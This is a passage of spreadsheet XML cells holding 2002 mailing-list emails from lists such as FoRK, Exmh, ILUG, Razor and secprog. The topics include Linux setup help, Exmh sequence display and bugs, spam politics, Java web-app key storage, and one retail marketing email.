    <t>In a message dated Wed, 24 Jul 2002 1:51:48 PM Eastern Standard Time, kra@monkey.org writes:\n\n&gt; \n&gt; I guess that the reason that I disagree is that some groups arguing\n&gt; against any checks on genetic engineering use that same argument -\n&gt; "we've been doing it since prehistory, so we don't need to apply any\n&gt; caution today".\n&gt; \n\nThat the process of engineering is a natural, human inclination is what history proves; that humans don't learn from history is what natural, unimpeded inclinations prove.\n\ngeege\n&gt; -- \n&gt; Karl Anderson      kra@monkey.org           \n&gt; [URL]http://www.monkey.org[/URL]\n&gt; [URL]http://xent.com[/URL] \n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: secprog@securityfocus.com\nFrom: Mario Torre &lt;neugens@libero.it&gt;\nDate: Thu, 22 Aug 2002 23:49:00 +0200</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 23:49:00 +0200</t>
  </si>
  <si>
    <t>Mario Torre &lt;neugens@libero.it&gt;</t>
  </si>
  <si>
    <t>Re: Encryption approach to secure web applications</t>
  </si>
  <si>
    <t>Hi,\n\nThank you for the useful replies, I have found some interesting \ntutorials in the ibm developer connection.\n\n[URL]https://www6.software.ibm.com[/URL]\n\nand\n\n[URL]https://www6.software.ibm.com[/URL]\n\nRegistration is needed.\n\nI will post the same message on the Web Application Security list, as \nsuggested by someone.\n\nFor now, I thing I will use md5 for password checking (I will use the \napproach described in secure programmin fo linux and unix how-to).\n\nI will separate the authentication module, so I can change its \nimplementation at anytime.\n\nThank you again!\n\nMario Torre\n-- \nPlease avoid sending me Word or PowerPoint attachments.\nSee [URL]http://www.fsf.org[/URL]</t>
  </si>
  <si>
    <t>https://www6.software.ibm.com https://www6.software.ibm.com http://www.fsf.org</t>
  </si>
  <si>
    <t>To: Exmh Users Mailing List &lt;exmh-users@spamassassin.taint.org&gt;\nFrom: Tony Nugent &lt;tony@linuxworks.com.au&gt;\nDate: Thu, 22 Aug 2002 23:36:32 +1000</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 23:36:32 +1000</t>
  </si>
  <si>
    <t>Tony Nugent &lt;tony@linuxworks.com.au&gt;</t>
  </si>
  <si>
    <t>Exmh Users Mailing List &lt;exmh-users@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Re: Insert signature</t>
  </si>
  <si>
    <t>On Wed Aug 21 2002 at 15:46, Ulises Ponce wrote:\n\n&gt; Hi!\n&gt; \n&gt; Is there a command to insert the signature using a combination of keys and not\n&gt; to have sent the mail to insert it then?\n\nI simply put it (them) into my (nmh) component files (components,\nreplcomps, forwcomps and so on).  That way you get them when you are\nediting your message.  Also, by using comps files for specific\nfolders you can alter your .sig per folder (and other tricks).  See\nthe docs for (n)mh for all the details.\n\nThere might (must?) also be a way to get sedit to do it, but I've\nbeen using gvim as my exmh message editor for a long time now.  I\nload it with a command that loads some email-specific settings, eg,\nto "syntax" colour-highlight the headers and quoted parts of an\nemail)... it would be possible to map some (vim) keys that would add\na sig (or even give a selection of sigs to choose from).\n\nAnd there are all sorts of ways to have randomly-chosen sigs...\nsomewhere at rtfm.mit.edu... ok, here we go:\nrtfm.mit.edu/pub/usenet-by-group/news.answers/signature_finger_faq.\n(Warning... it's old, May 1995).\n\n&gt; Regards,\n&gt; Ulises\n\nHope this helps.\n\nCheers\nTony\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Chris Garrigues &lt;cwg-dated-1030480087.b12d57@DeepEddy.Com&gt;\nFrom: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;\nDate: Thu, 22 Aug 2002 23:14:20 +0200</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 23:14:20 +0200</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-dated-1030480087.b12d57@DeepEddy.Com&gt;</t>
  </si>
  <si>
    <t>Re: CVS report</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; On Thu, 22 Aug 2002, "Chris" == Chris Garrigues wrote:   Chris&gt; --==_Exmh_267413022P Content-Type: text/plain;   Chris&gt; charset=us-ascii   +&gt; From:  Anders Eriksson  Date:  Thu, 22 Aug   +&gt; 2002 20:23:17 +0200   +&gt; Oooops!   +&gt; Doesn't work at all. Got this on startup and on any attempt to   +&gt; change folde r (which fail)   Chris&gt; ~sigh~ I'd already found that and checked it in....apparently   Chris&gt; I did so after you checked it out and before you sent this   Chris&gt; mail...I hoped I was fast enough that you wouldn't see it.   Chris&gt; Try again! Works like a charm. It's like the box was on drugs or something.  However, while testing it a selected my favourite folder (l-k) and  marked ~400 messages unread. THAT took forever, or about as long as  Catch-up Unseen did before. Any suggestions? /A _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: "ILUG" &lt;ilug@linux.ie&gt;\nFrom: "Kiall Mac Innes" &lt;kialllists@redpie.com&gt;\nDate: Thu, 22 Aug 2002 23:06:27 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 23:06:27 +0100</t>
  </si>
  <si>
    <t>RE: [ILUG] Newbie seeks advice - Suse 7.2</t>
  </si>
  <si>
    <t>hehe sorry but if you hit caps lock twice the computer crashes?  theres one\nive never heard before... have you tryed Dell support yet? I think dell\ncomputers prefer RedHat... (dell provide some computers pre-loaded with red\nhat) i dont know for sure tho! so get someone elses opnion as well as\nmine...\n\n-----Original Message-----\nFrom: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie]On Behalf Of Peter\nStaunton\nSent: 22 August 2002 19:58\nTo: ilug@linux.ie\nSubject: [ILUG] Newbie seeks advice - Suse 7.2\n\n\nFolks,\n\nmy first time posting - have a bit of Unix experience, but am new to Linux.\n\n\nJust got a new PC at home - Dell box with Windows XP. Added a second hard\ndisk\nfor Linux. Partitioned the disk and have installed Suse 7.2 from CD, which\nwent\nfine except it didn't pick up my monitor.\n\nI have a Dell branded E151FPp 15" LCD flat panel monitor and a nVidia\nGeForce4\nTi4200 video card, both of which are probably too new to feature in Suse's\ndefault\nset. I downloaded a driver from the nVidia website and installed it using\nRPM.\nThen I ran Sax2 (as was recommended in some postings I found on the net),\nbut\nit still doesn't feature my video card in the available list. What next?\n\nAnother problem. I have a Dell branded keyboard and if I hit Caps-Lock\ntwice,\nthe whole machine crashes (in Linux, not Windows) - even the on/off switch\nis\ninactive, leaving me to reach for the power cable instead.\n\nIf anyone can help me in any way with these probs., I'd be really grateful -\nI've searched the 'net but have run out of ideas.\n\nOr should I be going for a different version of Linux such as RedHat?\nOpinions\nwelcome.\n\nThanks a lot,\nPeter\n\n--\nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Matthew French" &lt;mfrench42@yahoo.co.uk&gt;\nDate: Thu, 22 Aug 2002 22:58:39 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 22:58:39 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] Re: Sun Solaris</t>
  </si>
  <si>
    <t>Mark Twomey joked: &gt;  &gt;erm... it runs Solaris x86 as standard... &gt; &gt; It runs Solaris 8 x86 as standard. &gt; (I was joking Al) And will run Solaris 9 when Sun catch up with the x86 drivers and kernel. Although don't hold your breath for the free DVD. It will never come. (Spot the person who applied for the free Solaris 9 DVD, only to be told three months later it is no longer available.) FWIW Solaris and Linux seem to be getting closer all the time. I can no longer see any specific reason why one is better than the other. Expect Red Hat Solaris 11 any time now...  - Matthew __________________________________________________ Do You Yahoo!? Everything you'll ever need on one web page from News and Sport to Email and Music Charts [URL]http://uk.my.yahoo.com[/URL] --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: harley@argote.ch (Robert Harley)\nDate: Thu, 22 Aug 2002 22:58:34 +0200 (CEST)</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 22:58:34 +0200 (CEST)</t>
  </si>
  <si>
    <t>Entrepreneurs</t>
  </si>
  <si>
    <t>An apparent quote from Dubya, from the Times (sent to me by my Dad):\n\n[URL]http://www.timesonline.co.uk[/URL],,1-43-351083,00.html\n\n------------------------------------------------------------------------------\nTONY BLAIR's special relationship with George W. Bush is under\nconsiderable strain. Not only do the two disagree on Yassir Arafat's\ntenure as leader of the Palestinian Authority, but Blair has started\ntelling disparaging anecdotes about the President.\n\nBaroness Williams of Crosby recalled a story told to her by 'my good\nfriend Tony Blair' recently in Brighton. Blair, Bush and Jacques\nChirac were discussing economics and, in particular, the decline of\nthe French economy. 'The problem with the French,' Bush confided in\nBlair, 'is that they don't have a word for entrepreneur.'\n------------------------------------------------------------------------------\n\nR\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.timesonline.co.uk http://xent.com</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Mark Twomey &lt;bauwolf@indigo.ie&gt;\nDate: Thu, 22 Aug 2002 22:25:12 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 22:25:12 +0100</t>
  </si>
  <si>
    <t>Mark Twomey &lt;bauwolf@indigo.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] Re: Sun Solaris</t>
  </si>
  <si>
    <t>Al white wrote:\n\n &gt;erm... it runs Solaris x86 as standard...\n\nIt runs Solaris 8 x86 as standard.\n(I was joking Al)\n\nM.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: &lt;mail@vipul.net&gt;, &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nDate: Thu, 22 Aug 2002 22:14:13 -0400</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 22:14:13 -0400</t>
  </si>
  <si>
    <t>RE: [Razor-users] honor is not in csl</t>
  </si>
  <si>
    <t>I know that I did this during the week that all the catalogue's were\nhokey but after that I changed it back to discovery.  So I can see why\npeople are using honor.\n\n-----Original Message-----\nFrom: Vipul Ved Prakash [mailto:mail@vipul.net] \nSent: Thursday, August 22, 2002 5:55 PM\nTo: razor-users@example.sourceforge.net\nSubject: [Razor-users] honor is not in csl\n\n\nFolks, \n\nSome of you seem to have hardcoded honor as the default catalogue\nserver. There are three catalogue only servers running now, and honor is\nacting as a nomination only server. Tonight we will be completely\nturning off catalogue support on honor, so if you are specifying honor\nwith the -rs option, please take it out and let the agents discover a\ncloseby catalogue server.\n\ncheers,\nvipul.\n\n\n-- \n\nVipul Ved Prakash          |   "The future is here, it's just not \nSoftware Design Artist     |    widely distributed."\n[URL]http://vipul.net[/URL]          |              -- William Gibson\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old cell\nphone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://vipul.net https://www.inphonic.com https://lists.sourceforge.net https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: Chris Garrigues &lt;cwg-dated-1030376441.95dd45@DeepEddy.Com&gt;\nFrom: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nDate: Thu, 22 Aug 2002 21:55:18 +0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 21:55:18 +0700</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-dated-1030376441.95dd45@DeepEddy.Com&gt;</t>
  </si>
  <si>
    <t>Date:        Wed, 21 Aug 2002 10:40:39 -0500     From:        Chris Garrigues      Message-ID:  &lt;1029944441.398.TMDA@deepeddy.vircio.com&gt;   | The background color in this window is the same as the background    | color in the ftoc. That's what I'd like to vary - particularly as the ftoc background isn't constant - messages in the unseen sequence have a different background than others. In the ftoc that's fine, but in the sequences window, it isn't needed. unseen already has a different foreground there (no problem with that), it doesn't need a different background as well. I'll play about a bit with this, and with making it vertical instead of horizontal, and see what turns up.   | The only sequences that are defined there are sequences which are defined   | in app-defaults-color or ~/exmh/exmh-defaults-color. OK.   | I've been thinking about how to dynamically generate highlighting for   | other sequences, but haven't got that figured out yet. In this case, highlighting wasn't what I was most concerned about. A method to get messages in &amp; out of sequences comes first, how it displays is a secondary consideration.   But as a suggestion, have an "all unknown" sequence highlight, any message in a sequence which has no defined highlighting (where defined includes defined to not be treated specially) gets highlighted the same way (maybe something as boring as a dark brown text colour - almost indistinguishable from the normal black)   | &gt; &gt; Any chance of making the current message a little brighter background?   |    | I don't see any reason why not.  Experiment and let me know what works for you. Done some of that.   First, the most significant change came from changing relief from raised to sunken.   I don't know why, but it just looks better (for me anyway).   But even with that, cur and unseen are still just a bit too similar.   I ended up using *sequence_cur:  -background {PaleGoldenrod} -relief sunken -borderwidth 2 The unnecessary braces are just because some of the colours I was using had spaces in their names.   PaleGoldenrod translates as #eee8aa which is probably safer for generic use. kre _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "John Evdemon" &lt;jevdemon@acm.org&gt;\nDate: Thu, 22 Aug 2002 21:44:23 -0400</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 21:44:23 -0400</t>
  </si>
  <si>
    <t>Re: Entrepreneurs</t>
  </si>
  <si>
    <t>On 23 Aug 2002 at 2:57, Robert Harley wrote:\n\n&gt; It's an amusing anecdote, I don't know if it's true or not,\n&gt; but certainly nothing here supports the authoritative\n&gt; sounding conclusion "Status: False".\n\nI actually thought it was pretty funny and quite accurate.  Who cares if the spinmeisters are denying it?\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: CARRIE@AXESS.COM\nFrom: dELiA*s &lt;delias_b@email.iturf.com&gt;\nDate: Thu, 22 Aug 2002 21:23:14 GMT</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 21:23:14 GMT</t>
  </si>
  <si>
    <t>dELiA*s &lt;delias_b@email.iturf.com&gt;</t>
  </si>
  <si>
    <t>CARRIE@AXESS.COM</t>
  </si>
  <si>
    <t>Outer Where? Right here, at dELiAs*cOm!</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. --_----------=_103005139443991 Content-Disposition: inline Content-Length: 574 Content-Transfer-Encoding: binary Content-Type: text/plain Dear dELiA*s Contests member, If you can see this, you have been subscribed to the mailing list as an HTML email user.  To switch to plain text mail, go to: [URL]http://lists.iturf.com[/URL] You are subscribed as: CARRIE@AXESS.COM You signed up to receive updates on exclusive specials and happenings at dELiAs.cOm. We'd love to continue to bring you this news, however, if you wish to remove yourself from this mailing list, go to: [URL]http://www.delias.com[/URL]  --_----------=_103005139443991 Content-Disposition: inline Content-Length: 4947 Content-Transfer-Encoding: binary Content-Type: text/html dELiAs.cOm You are subscribed as: CARRIE@AXESS.COMYou signed up to receive updates on exclusive specials and happenings at dELiAs*cOm. We'd love to continue to bring you this news, however, if you wish to remove yourself from this mailing list, Click here. Please do not reply to this message.  If you have any questions, comments, or would like to send feedback to dELiA*s, please send an e-mail to: help@delias.com. â„¢ and Â© 2002 dELiA*s Corp.  All rights reserved. --_----------=_103005139443991--</t>
  </si>
  <si>
    <t>http://lists.iturf.com http://www.delias.com</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: Ciaran Johnston &lt;cj@nologic.org&gt;\nDate: Thu, 22 Aug 2002 20:58:07 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 20:58:07 +0100</t>
  </si>
  <si>
    <t>Ciaran Johnston &lt;cj@nologic.org&gt;</t>
  </si>
  <si>
    <t>Update on this for anyone that's interested, and because I like closed  threads... nothing worse than an infinite while loop, is there? I ended up formatting a floppy on my flatmate's (un-networked) P100 running  FAT16 Win95, and mcopied the contents of the bootdisk across. Now I have a  FAT16 Win98 install running alongside Slackware, and can play Metal Gear  Solid when the mood takes me ;) /Ciaran. On Wednesday 21 August 2002 16:21, Ciaran Johnston wrote: &gt; Dublin said: &gt; &gt; If you copy the files from your disk to the c: partition and mark it as &gt; &gt; active it should work ... &gt; &gt; Yeah, I figured that, but it doesn't seem to ... well, if that's the case &gt; I'll give it another go tonight, maybe come back with some error messages. &gt; &gt; Just to clarify for those who didn't understand me initially - I have a &gt; floppy drive installed, but it doesn't physically work. There's nowhere &gt; handy to pick one up where I am, and I don't fancy waiting a few days for &gt; one to arrive from Peats. &gt; &gt; Thanks for the answers, &gt; Ciaran. &gt; &gt; &gt; You especially need io.sys, command.com and msdos.sys &gt; &gt; &gt; &gt; your cd driver .sys and read the autoexec.bat and config.sys files for &gt; &gt; hints on what you did with your boot floppy  &gt; &gt; &gt; &gt; P &gt; &gt; &gt; &gt; On Wed, 2002-08-21 at 14:07, Ciaran Johnston wrote: &gt; &gt;&gt; Hi folks, &gt; &gt;&gt; The situation is this: at home, I have a PC with 2 10Gig HDDs, and no &gt; &gt;&gt; (working) floppy drive. I have been running Linux solely for the last &gt; &gt;&gt; year, but recently got the urge to, among other things, play some of &gt; &gt;&gt; my Windoze games. I normally install the windows partition using a &gt; &gt;&gt; boot floppy which I have conveniently zipped up, but I haven't any way &gt; &gt;&gt; of writing or reading a floppy. &gt; &gt;&gt; So, how do I go about: &gt; &gt;&gt; 1. formatting a C: drive with system files (normally I would use &gt; &gt;&gt; format /s c: from the floppy). &gt; &gt;&gt; 2. Installing the CDROM drivers (my bootdisk (I wrote it many years &gt; &gt;&gt; ago) does this normally). &gt; &gt;&gt; 3. Booting from the partition? &gt; &gt;&gt; &gt; &gt;&gt; I wiped all my linux partitions from the first drive and created &gt; &gt;&gt; partitions for Windows (HDA1) Slackware and RedHat. I used cfdisk for &gt; &gt;&gt; this. I made the first drive (hda) bootable. I then installed the &gt; &gt;&gt; windows partition in LILO and reran lilo (installed in MBR). I copied &gt; &gt;&gt; the contents of boot.zip to my new windows partition and tried to boot &gt; &gt;&gt; it - all I get is a garbled line of squiggles. &gt; &gt;&gt; &gt; &gt;&gt; Anyone any ideas? I can't think of anywhere in Athlone to get a new &gt; &gt;&gt; floppy drive this evening... &gt; &gt;&gt; &gt; &gt;&gt; Thanks, &gt; &gt;&gt; Ciaran. &gt; &gt;&gt; &gt; &gt;&gt; &gt; &gt;&gt; &gt; &gt;&gt; -- &gt; &gt;&gt; Irish Linux Users' Group: ilug@linux.ie &gt; &gt;&gt; [URL]http://www.linux.ie[/URL] for (un)subscription &gt; &gt;&gt; information. List maintainer: listmaster@linux.ie --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Chris Garrigues &lt;cwg-dated-1030470582.50ccab@DeepEddy.Com&gt;,\nFrom: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;\nDate: Thu, 22 Aug 2002 20:23:17 +0200</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 20:23:17 +0200</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-dated-1030470582.50ccab@DeepEddy.Com&gt;,</t>
  </si>
  <si>
    <t>Oooops!\n\nDoesn't work at all. Got this on startup and on any attempt to change folder (which fail)\n\n/Anders\n\ncan't read "flist(seqcount,lists/exmh,unseen)": no such element in array\n    (reading value of variable to increment)\n    invoked from within\n"incr flist(seqcount,$folder,$seq) $delta"\n    (procedure "Seq_Del" line 16)\n    invoked from within\n"Seq_Del $exmh(folder) $mhProfile(unseen-sequence) $msgid"\n    (procedure "MsgSeen" line 7)\n    invoked from within\n"MsgSeen $msgid"\n    (procedure "MsgShow" line 12)\n    invoked from within\n"MsgShow $msgid"\n    (procedure "MsgChange" line 17)\n    invoked from within\n"MsgChange 73 show"\n    invoked from within\n"time [list MsgChange $msgid $show"\n    (procedure "Msg_Change" line 3)\n    invoked from within\n"Msg_Change $msg(id) $show"\n    (procedure "Msg_Show" line 7)\n    invoked from within\n"Msg_Show cur"\n    ("eval" body line 1)\n    invoked from within\n"eval $msgShowProc"\n    (procedure "FolderChange" line 55)\n    invoked from within\n"FolderChange lists/exmh {Msg_Show cur}"\n    invoked from within\n"time [list  FolderChange $folder $msgShowProc"\n    (procedure "Folder_Change" line 3)\n    invoked from within\n"Folder_Change $exmh(folder)"\n    (procedure "Exmh" line 101)\n    invoked from within\n"Exmh"\n    ("after" script)\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: secprog@securityfocus.com\nFrom: Mario Torre &lt;neugens@libero.it&gt;\nDate: Thu, 22 Aug 2002 20:15:15 +0200</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 20:15:15 +0200</t>
  </si>
  <si>
    <t>Encryption approach to secure web applications</t>
  </si>
  <si>
    <t>Hi everybody!\n\nI'm writing a web application in java (tomcat + jsp/servlets + database \naccess with postgreSQL).\n\nThis will be released under the GPL and will eventually be useful as a \nframework for other web applications.\n\nThe application main focus is e-commerce, but not limited to that.\n\nI would like to use some form of cryptography to protect data on the \ndatabase, but I have some problem figuring out the right approach.\n\nAbove all, how to store passwords and keys in a shared web server.\n\nA problem that I was unable to solve is how to store keys for \nencryption/decryption. The api that I'm using is the jca (jdk1.4.x), \nand the methods of saving generated keys in keystores fails always. \n\nI can serialize the object, and store in the database, but this is not \nthe most secure approach: this key is needed to decrypt data in the \ndatabase, but the database is accessible from the web application. \nAssuming that I can find a good and secure place where to store the \ndatabase password, I can use a different database with different \nuser... Argh... to complex and doesn't really solve the problem.\n\nWhere I can found good documentation about this topic?\n\nThere is another approach that I would share with the list, something I \nthought that can be of bit interest, but probabily wrong and insecure. \nAfter all, I'm a real beginner in secure programming, and I'm here to \nlearn methods and technics.\n\nFirst of all, I need a secure way to keep database passwords secure, so \nI have to keep them separate from the main server. The right approach \ncould be using a small java bean application that run as normal user \n(not tomcat, so it is not shared with other web services or, worst, the \nnobody user), that has no shell login, but has a default home directory \nor a place where it can hold passwords and keys.\n\nThe web application could then open an ssl connection (could be done in \nthe init method at server startup) to get database passwords. The small \nbean could check via code signature/rmi/whatever else that the source \nis the right one, and handle all the database connections, or give the \ndb connection/password to the main web application.\n\nIn this way, we solve the problem of keeping the keys and passwords in \nshared directories, and also, an attacker should get root/bean user \naccount to read data. This is not perfect, and works only if your \nprovider gives the opportunity to configure a separated java \napplication (that means, really, another server running in the \nbackground).\n\nAny suggestions?\n\nThank you,\nMario Torre\n-- \nPlease avoid sending me Word or PowerPoint attachments.\nSee [URL]http://www.fsf.org[/URL]</t>
  </si>
  <si>
    <t>http://www.fsf.org</t>
  </si>
  <si>
    <t>To: &lt;spamassassin-devel@example.sourceforge.net&gt;\nFrom: "Erik Rudolfs" &lt;abbo@impression.nu&gt;\nDate: Thu, 22 Aug 2002 19:51:35 +0200</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 19:51:35 +0200</t>
  </si>
  <si>
    <t>"Erik Rudolfs" &lt;abbo@impression.nu&gt;</t>
  </si>
  <si>
    <t>&lt;spamassassin-devel@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>[SAdev] Spam-Assassin nightly build 22-8-02</t>
  </si>
  <si>
    <t>Hello all,\nI get problems with the latest nightly build from Spamassassin with\nVMailMgr + OMail-Admin. \nIt scans the mail and gives it an :\n\n        X-Spam-Status: No, hits=11.4 required=7.0\n\nCan someone look at the code for it? Maybe because option -F is gone?\n\n\nGreetings\nErik Rudolfs\n\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To: Lucas Gonze &lt;lgonze@panix.com&gt;\nFrom: Dan Brickley &lt;danbri@w3.org&gt;\nDate: Thu, 22 Aug 2002 19:39:45 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 19:39:45 -0400 (EDT)</t>
  </si>
  <si>
    <t>Dan Brickley &lt;danbri@w3.org&gt;</t>
  </si>
  <si>
    <t>Re: The case for spam</t>
  </si>
  <si>
    <t>On Thu, 22 Aug 2002, Lucas Gonze wrote:\n\n&gt;\n&gt; Political mail (the snail kind) doesn't bother me.  I like it a lot of the\n&gt; time, because as crap as it is at least it's not the kind of info you get\n&gt; on TV.  Particularly for small time local politics, it's the best way to\n&gt; get information.\n\nExcept that thanks to the magic of spam, it's usually some else's locale\n\n&gt; but what matters is that mail is speech, and political email has to be as\n&gt; well protected as any other political speech.  Spam is *the* tool for\n&gt; dissident news, since the face that it's unsolicited means that recipients\n&gt; can't be blamed for being on a mailing list.\n\nA terrible argument. There are better technical solutions to privacy\nprotection than sending a copy of the same message to everyone on the\nInternet, so the recipients can't be blamed for reading it.\n\nWait till phone spam is as cheap to send as email spam...\n\nDan\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: nan\nFrom: Lucas Gonze &lt;lgonze@panix.com&gt;\nDate: Thu, 22 Aug 2002 19:18:12 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 19:18:12 -0400 (EDT)</t>
  </si>
  <si>
    <t>Political mail (the snail kind) doesn't bother me.  I like it a lot of the \ntime, because as crap as it is at least it's not the kind of info you get \non TV.  Particularly for small time local politics, it's the best way to \nget information.\n\nbut what matters is that mail is speech, and political email has to be as\nwell protected as any other political speech.  Spam is *the* tool for\ndissident news, since the face that it's unsolicited means that recipients\ncan't be blamed for being on a mailing list.\n\n\n\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Albert White - SUN Ireland &lt;albert.white@ireland.sun.com&gt;\nDate: Thu, 22 Aug 2002 19:11:19 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 19:11:19 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] Sun Solaris..</t>
  </si>
  <si>
    <t>&gt; On Thu, 22 Aug 2002, John P. Looney wrote:\n&gt; &gt;  Sun's hardware in general is more reliable,\n&gt; ROFL. not in our experience.\n\nWell at least our Caps-Lock keys work:\n\npeter@staunton.ie said:\n&gt; Another problem. I have a Dell branded keyboard and if I hit Caps-Lock\n&gt; twice, the whole machine crashes (in Linux, not Windows) - even the on/\n&gt; off switch is inactive, leaving me to reach for the power cable\n&gt; instead.\n\n:-P\n\nbauwolf@indigo.ie said:\n&gt; as if he wanted Solaris 9 for x86, he'd be waiting a bit\nerm... it runs Solaris x86 as standard...\n\nCheers,\n~Al\n\n-- \nExpressed in this posting are my opinions.  They are in no way related\nto opinions held by my employer, Sun Microsystems.\nStatements on Sun products included here are not gospel and may\nbe fiction rather than truth.\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Craig R.Hughes" &lt;craig@deersoft.com&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Thu, 22 Aug 2002 18:58:01 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 18:58:01 +0100</t>
  </si>
  <si>
    <t>"Craig R.Hughes" said:\n\n&gt; Are you filtering the nonspamtrap for spam when those \n&gt; newsletters sold your address to someone you didn't sign up \n&gt; with?  You should probably manually verify that all the mail in \n&gt; the trap is in fact nonspam!\n\nYep.  so far it's all opt-in stuff, no "affiliate deals" etc.\n\n--j.\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ilug@linux.ie\nFrom: "Peter Staunton" &lt;peter@staunton.ie&gt;\nDate: Thu, 22 Aug 2002 18:57:35 GMT</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 18:57:35 GMT</t>
  </si>
  <si>
    <t>"Peter Staunton" &lt;peter@staunton.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] Newbie seeks advice - Suse 7.2</t>
  </si>
  <si>
    <t>Folks,\n \nmy first time posting - have a bit of Unix experience, but am new to Linux.\n\n \nJust got a new PC at home - Dell box with Windows XP. Added a second hard disk\nfor Linux. Partitioned the disk and have installed Suse 7.2 from CD, which went\nfine except it didn't pick up my monitor.\n \nI have a Dell branded E151FPp 15" LCD flat panel monitor and a nVidia GeForce4\nTi4200 video card, both of which are probably too new to feature in Suse's default\nset. I downloaded a driver from the nVidia website and installed it using RPM.\nThen I ran Sax2 (as was recommended in some postings I found on the net), but\nit still doesn't feature my video card in the available list. What next?\n \nAnother problem. I have a Dell branded keyboard and if I hit Caps-Lock twice,\nthe whole machine crashes (in Linux, not Windows) - even the on/off switch is\ninactive, leaving me to reach for the power cable instead.\n \nIf anyone can help me in any way with these probs., I'd be really grateful -\nI've searched the 'net but have run out of ideas.\n \nOr should I be going for a different version of Linux such as RedHat? Opinions\nwelcome.\n \nThanks a lot,\nPeter\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
